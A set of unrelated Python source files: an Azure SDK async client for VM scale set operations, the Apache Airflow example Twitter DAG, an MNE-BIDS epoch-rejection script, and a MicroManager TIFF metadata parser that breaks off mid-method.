response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetVMInstanceView', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_instance_view.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/instanceView'} # type: ignore
@distributed_trace
def list(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
filter: Optional[str] = None,
select: Optional[str] = None,
expand: Optional[str] = None,
**kwargs: Any
) -> AsyncIterable["_models.VirtualMachineScaleSetVMListResult"]:
"""Gets a list of all virtual machines in a VM scale sets.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the VM scale set.
:type virtual_machine_scale_set_name: str
:param filter: The filter to apply to the operation. Allowed values are
'startswith(instanceView/statuses/code, 'PowerState') eq true', 'properties/latestModelApplied
eq true', 'properties/latestModelApplied eq false'.
:type filter: str
:param select: The list parameters. Allowed values are 'instanceView', 'instanceView/statuses'.
:type select: str
:param expand: The expand expression to apply to the operation. Allowed values are
'instanceView'.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualMachineScaleSetVMListResult or the result
of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVMListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetVMListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
virtual_machine_scale_set_name=virtual_machine_scale_set_name,
subscription_id=self._config.subscription_id,
filter=filter,
select=select,
expand=expand,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
resource_group_name=resource_group_name,
virtual_machine_scale_set_name=virtual_machine_scale_set_name,
subscription_id=self._config.subscription_id,
filter=filter,
select=select,
expand=expand,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("VirtualMachineScaleSetVMListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines'} # type: ignore
async def _power_off_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_power_off_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._power_off_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_power_off_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'} # type: ignore
@distributed_trace_async
async def begin_power_off(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Power off (stop) a virtual machine in a VM scale set. Note that resources are still attached
and you are getting charged for the resources. Instead, use deallocate to release resources and
avoid charges.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._power_off_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_power_off.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'} # type: ignore
async def _restart_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_restart_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._restart_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_restart_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'} # type: ignore
@distributed_trace_async
async def begin_restart(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Restarts a virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._restart_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'} # type: ignore
async def _start_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_start_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._start_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'} # type: ignore
@distributed_trace_async
async def begin_start(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Starts a virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._start_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'} # type: ignore
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# --------------------------------------------------------------------------------
# Written By: Ekhtiar Syed
# Last Update: 8th April 2016
# Caveat: This Dag will not run because of missing scripts.
# The purpose of this is to give you a sample of a real world example DAG!
# --------------------------------------------------------------------------------
# --------------------------------------------------------------------------------
# Load The Dependencies
# --------------------------------------------------------------------------------
"""
This is an example dag for managing twitter data.
"""
from datetime import date, timedelta
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.hive_operator import HiveOperator
from airflow.operators.python_operator import PythonOperator
# --------------------------------------------------------------------------------
# Create a few placeholder scripts. In practice these would be different python
# script files, which are imported in this section with absolute or relative imports
# --------------------------------------------------------------------------------
def fetchtweets():
"""
This is a placeholder for fetchtweets.
"""
def cleantweets():
"""
This is a placeholder for cleantweets.
"""
def analyzetweets():
"""
This is a placeholder for analyzetweets.
"""
def transfertodb():
"""
This is a placeholder for transfertodb.
"""
# --------------------------------------------------------------------------------
# set default arguments
# --------------------------------------------------------------------------------
default_args = {
'owner': 'Ekhtiar',
'depends_on_past': False,
'start_date': airflow.utils.dates.days_ago(5),
'email': ['airflow@example.com'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=5),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
}
with DAG(
dag_id='example_twitter_dag',
default_args=default_args,
schedule_interval="@daily"
) as dag:
    # --------------------------------------------------------------------------------
    # This task should call the Twitter API and retrieve yesterday's tweets sent
    # from and to the four twitter users (Twitter_A, ..., Twitter_D). It should
    # generate eight CSV output files, named
    # direction(from or to)_twitterHandle_date.csv.
    # --------------------------------------------------------------------------------
fetch_tweets = PythonOperator(
task_id='fetch_tweets',
python_callable=fetchtweets
)
    # --------------------------------------------------------------------------------
    # Clean the eight files. In this step you can drop or cherry-pick columns and
    # different parts of the text.
    # --------------------------------------------------------------------------------
clean_tweets = PythonOperator(
task_id='clean_tweets',
python_callable=cleantweets
)
clean_tweets << fetch_tweets
    # --------------------------------------------------------------------------------
    # In this section you can use a script to analyze the twitter data. This could
    # simply be sentiment analysis via an algorithm like bag-of-words, or something
    # more complicated. You can also look at web services for such tasks.
    # --------------------------------------------------------------------------------
analyze_tweets = PythonOperator(
task_id='analyze_tweets',
python_callable=analyzetweets
)
analyze_tweets << clean_tweets
    # --------------------------------------------------------------------------------
    # Although this is the last task, we need to declare it before the tasks below,
    # because they set it as a downstream dependency (via >>). This task will
    # extract a summary from the Hive data and store it in MySQL.
    # --------------------------------------------------------------------------------
hive_to_mysql = PythonOperator(
task_id='hive_to_mysql',
python_callable=transfertodb
)
    # --------------------------------------------------------------------------------
    # The following tasks are generated in a for loop. The first task puts the eight
    # CSV files into HDFS. The second task loads these files from HDFS into the
    # respective Hive tables. The two loops could be combined into one, but in most
    # cases you will run different analyses on your incoming and outgoing tweets,
    # hence they are kept separate in this example.
    # --------------------------------------------------------------------------------
from_channels = ['fromTwitter_A', 'fromTwitter_B', 'fromTwitter_C', 'fromTwitter_D']
to_channels = ['toTwitter_A', 'toTwitter_B', 'toTwitter_C', 'toTwitter_D']
yesterday = date.today() - timedelta(days=1)
dt = yesterday.strftime("%Y-%m-%d")
    # define where the tweets csv files are stored in the local directory
    local_dir = "/tmp/"
    # define where to store them in HDFS; the leading space is intentional, as it
    # separates the local path from the HDFS path in the bash_command below
    hdfs_dir = " /tmp/"
for channel in to_channels:
file_name = "to_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
for channel in from_channels:
file_name = "from_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
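    # Note: the bitshift operators set task dependencies: `a << b` is equivalent
    # to a.set_upstream(b), and `a >> b` to a.set_downstream(b). For example, the
    # chain above could equivalently be written as:
    #     fetch_tweets >> clean_tweets >> analyze_tweets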
|
"""
========================================================
06. Remove epochs based on peak-to-peak (PTP) amplitudes
========================================================
Epochs containing peak-to-peak amplitudes above the thresholds defined
in the 'reject' parameter are removed from the data.
This step will drop epochs containing non-biological artifacts,
but also epochs containing biological artifacts not sufficiently
corrected by the ICA or the SSP processing.
"""
import itertools
import logging
from typing import Optional
import mne
from mne.utils import BunchConst
from mne.parallel import parallel_func
from mne_bids import BIDSPath
import config
from config import gen_log_kwargs, on_error, failsafe_run
logger = logging.getLogger('mne-bids-pipeline')
@failsafe_run(on_error=on_error, script_path=__file__)
def drop_ptp(*, cfg, subject, session=None):
bids_path = BIDSPath(subject=subject,
session=session,
task=cfg.task,
acquisition=cfg.acq,
run=None,
recording=cfg.rec,
space=cfg.space,
suffix='epo',
extension='.fif',
datatype=cfg.datatype,
root=cfg.deriv_root,
check=False)
infile_processing = cfg.spatial_filter
fname_in = bids_path.copy().update(processing=infile_processing)
fname_out = bids_path.copy().update(processing='clean')
msg = f'Input: {fname_in}, Output: {fname_out}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
# Get rejection parameters and drop bad epochs
epochs = mne.read_epochs(fname_in, preload=True)
reject = config.get_reject(epochs=epochs)
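    # `reject` maps channel types to PTP amplitude thresholds; illustrative
    # (hypothetical) values: {'grad': 4000e-13, 'mag': 4e-12, 'eeg': 150e-6}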
if cfg.ica_reject is not None:
for ch_type, threshold in cfg.ica_reject.items():
if (ch_type in reject and
threshold < reject[ch_type]):
# This can only ever happen in case of
# reject = 'autoreject_global'
msg = (f'Adjusting PTP rejection threshold proposed by '
f'autoreject, as it is greater than ica_reject: '
f'{ch_type}: {reject[ch_type]} -> {threshold}')
logger.info(**gen_log_kwargs(message=msg,
subject=subject, session=session))
reject[ch_type] = threshold
msg = f'Using PTP rejection thresholds: {reject}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
n_epochs_before_reject = len(epochs)
epochs.reject_tmin = cfg.reject_tmin
epochs.reject_tmax = cfg.reject_tmax
epochs.drop_bad(reject=reject)
n_epochs_after_reject = len(epochs)
if 0 < n_epochs_after_reject < 0.5 * n_epochs_before_reject:
msg = ('More than 50% of all epochs rejected. Please check the '
'rejection thresholds.')
logger.warning(**gen_log_kwargs(message=msg, subject=subject,
session=session))
elif n_epochs_after_reject == 0:
raise RuntimeError('No epochs remaining after peak-to-peak-based '
'rejection. Cannot continue.')
    msg = 'Saving cleaned, baseline-corrected epochs …'
    logger.info(**gen_log_kwargs(message=msg, subject=subject,
                                 session=session))
    epochs.apply_baseline(cfg.baseline)
    epochs.save(fname_out, overwrite=True)
def get_config(
subject: Optional[str] = None,
session: Optional[str] = None
) -> BunchConst:
cfg = BunchConst(
task=config.get_task(),
datatype=config.get_datatype(),
acq=config.acq,
rec=config.rec,
space=config.space,
baseline=config.baseline,
reject_tmin=config.reject_tmin,
reject_tmax=config.reject_tmax,
spatial_filter=config.spatial_filter,
ica_reject=config.get_ica_reject(),
deriv_root=config.get_deriv_root(),
decim=config.decim
)
return cfg
def main():
"""Run epochs."""
parallel, run_func, _ = parallel_func(drop_ptp, n_jobs=config.get_n_jobs())
logs = parallel(
run_func(cfg=get_config(), subject=subject, session=session)
for subject, session in
itertools.product(config.get_subjects(),
config.get_sessions())
)
config.save_logs(logs)
if __name__ == '__main__':
main()
|
import datetime
import hashlib
import json
import numpy as np
import pandas as pd
import tifffile
def timestamp():
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
class MicroManagerTIFF:
def __init__(self, src_filepath, verbose=True):
        '''
        src_filepath : path to the source MicroManager TIFF file
        verbose : if True, print logged events as they occur
        '''
self.verbose = verbose
self.src_filepath = src_filepath
self.events = []
self.global_metadata = {'processing_timestamp': timestamp()}
self.open_tiff()
def event_logger(self, message):
        '''
        Record a timestamped processing event (and print it if verbose)
        '''
if self.verbose:
print('EVENT: %s' % message)
self.events.append({'message': message, 'timestamp': timestamp()})
def save_events(self, dst_filepath):
if not self.events:
return
pd.DataFrame(data=self.events).to_csv(dst_filepath, index=False)
def save_global_metadata(self, dst_filepath):
with open(dst_filepath, 'w') as file:
json.dump(self.global_metadata, file)
def save_mm_metadata(self, dst_filepath):
self.mm_metadata.to_csv(dst_filepath, index=False)
def calc_hash(self):
'''
Calculate the sha1 hash from the file contents
'''
sha1 = hashlib.sha1()
with open(self.src_filepath, 'rb') as file:
sha1.update(file.read())
hash_value = sha1.hexdigest()
self.global_metadata['sha1_hash'] = hash_value
return hash_value
def open_tiff(self):
'''
Open the stack using tifffile.TiffFile
'''
self.tiff = tifffile.TiffFile(self.src_filepath)
@staticmethod
def _parse_mm_tag_schema_v1(mm_tag):
'''
Parse a MicroManagerMetadata tag in the 'old' schema
(KC: I believe this schema corresponds to MicroManager 1.x)
'''
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag['AndorEMCCD-Exposure'],
'laser_status_405': mm_tag['AndorILE-A-Laser 405-Power Enable'],
'laser_power_405': mm_tag['AndorILE-A-Laser 405-Power Setpoint'],
'laser_status_488': mm_tag['AndorILE-A-Laser 488-Power Enable'],
'laser_power_488': mm_tag['AndorILE-A-Laser 488-Power Setpoint'],
}
return metadata
@staticmethod
def _parse_mm_tag_schema_v2(mm_tag):
'''
Parse a MicroManagerMetadata tag in the 'new' schema
(KC: I believe this schema corresponds to MicroManager 2.x)
'''
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag.get('Andor EMCCD-Exposure')['PropVal'],
'laser_status_405': mm_tag.get('Andor ILE-A-Laser 405-Power Enable')['PropVal'],
'laser_power_405': mm_tag.get('Andor ILE-A-Laser 405-Power Setpoint')['PropVal'],
'laser_status_488': mm_tag.get('Andor ILE-A-Laser 488-Power Enable')['PropVal'],
'laser_power_488': mm_tag.get('Andor ILE-A-Laser 488-Power Setpoint')['PropVal'],
}
return metadata
def parse_micromanager_metadata(self):
'''
Parse the MicroManager metadata for each page in the TIFF file
'''
# the IJMetadata appears only in the first page
ij_metadata = None
try:
ij_metadata = self.tiff.pages[0].tags['IJMetadata'].value['Info']
except Exception:
self.event_logger('There was no IJMetadata tag found on the first page')
if ij_metadata is not None:
try:
ij_metadata = json.loads(ij_metadata)
except Exception:
self.event_logger('IJMetadata could not be parsed by json.loads')
mm_metadata_rows = []
for ind, page in enumerate(self.tiff.pages):
mm_metadata_row = {
'page_ind': ind,
'error': False
}
mm_tag = page.tags.get('MicroManagerMetadata')
if not isinstance(mm_tag, tifffile.tifffile.TiffTag):
self.event_logger('There was no MicroManagerMetadata tag found on page %s' % ind)
mm_metadata_row['error'] = True
mm_metadata_rows.append(mm_metadata_row)
continue
try:
page_metadata_v1 = self._parse_mm_tag_schema_v1(mm_tag.value)
except Exception:
page_metadata_v1 = None
try:
page_metadata_v2 = self._parse_mm_tag_schema_v2(mm_tag.value)
except Exception:
page_metadata_v2 = None
page_metadata = {}
mm_metadata_version = None
if page_metadata_v1 is not None:
mm_metadata_version = 'v1'
page_metadata = page_metadata_v1
elif page_metadata_v2 is not None:
mm_metadata_version = 'v2'
page_metadata = page_metadata_v2
else:
mm_metadata_row['error'] = True
self.event_logger('Unable to parse MicroManagerMetadata tag from page %s' % ind)
mm_metadata_rows.append({**mm_metadata_row, **page_metadata})
self.mm_metadata = pd.DataFrame(data=mm_metadata_rows)
self.global_metadata['mm_metadata_version'] = mm_metadata_version
class RawPipelineTIFF(MicroManagerTIFF):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# the channels we expect to find in a Pipeline-like TIFF
self.laser_405 = '405'
self.laser_488 = '488'
def validate_micromanager_metadata(self):
'''
Validate the parsed MicroManager metadata tags for a raw Pipeline-like TIFF file
(these are TIFFs found in the 'PlateMicroscopy' directory)
Generates validated_mm_metadata and sets various flags
that determine whether and how to split the pages into the 405 and 488 channels
Steps
------
- drop rows with any NAs
- check that the dropped rows had a parsing error
- check for two channel_inds and an equal number of pages from each
- if there are no channel_inds, check for an even number of pages
- if there are two channel_inds, check that slice_inds
and exposure settings are consistent within each channel
'''
# whether the MM metadata has two channel inds with an equal number of slices
self.has_valid_channel_inds = False
# whether the MM metadata for each channel has slice_inds that increment by one
self.has_valid_slice_inds = False
# whether it is safe to split the TIFF stack into channels by splitting the pages in half,
# when there are not valid channel inds
self.safe_to_split_in_half = False
md = self.mm_metadata.copy()
# remove the error flag column
errors = md['error']
md = md.drop(labels='error', axis=1)
# drop rows with NAs in any of the columns parsed from the MicroManagerMetadata tag
parsed_columns = set(md.columns).difference(['page_ind'])
md = md.dropna(how='any', subset=parsed_columns, axis=0)
# check that the dropped rows had an error
# (note that 'error' means either there was no MM tag or it could not be parsed)
num_error_rows = errors.sum()
num_dropped_rows = self.mm_metadata.shape[0] - md.shape[0]
if num_dropped_rows != num_error_rows:
self.event_logger(
'%s rows with NAs were dropped but %s rows had errors'
% (num_dropped_rows, num_error_rows)
)
# check that we can coerce the parsed columns as expected
int_columns = ['slice_ind', 'channel_ind']
for column in int_columns:
md[column] = md[column].apply(int)
float_columns = ['laser_power_405', 'laser_power_488', 'exposure_time']
for column in float_columns:
md[column] = md[column].apply(float)
# if there are two distinct channels, we assign the first to 405 and the second to 488
self.channel_inds = None
unique_channel_inds = sorted(md.channel_ind.unique())
if len(unique_channel_inds) == 2:
self.channel_inds = {
self.laser_405: min(unique_channel_inds),
self.laser_488: max(unique_channel_inds),
}
# if there are three channel_inds, we assume the third channel is brightfield
elif set(unique_channel_inds) == set([0, 1, 2]):
self.event_logger('There were three channel inds')
self.channel_inds = {
self.laser_405: 0,
self.laser_488: 1,
}
# if there's one channel index, check for an even number of pages
elif len(unique_channel_inds) == 1:
if np.mod(md.shape[0], 2) == 0:
self.safe_to_split_in_half = True
else:
self.event_logger('There is one channel_ind and an odd number of pages')
else:
self.event_logger('Unexpected number of channel_inds (%s)' % unique_channel_inds)
# if there were valid channel_inds, check for an equal number of pages from each channel
if self.channel_inds is not None:
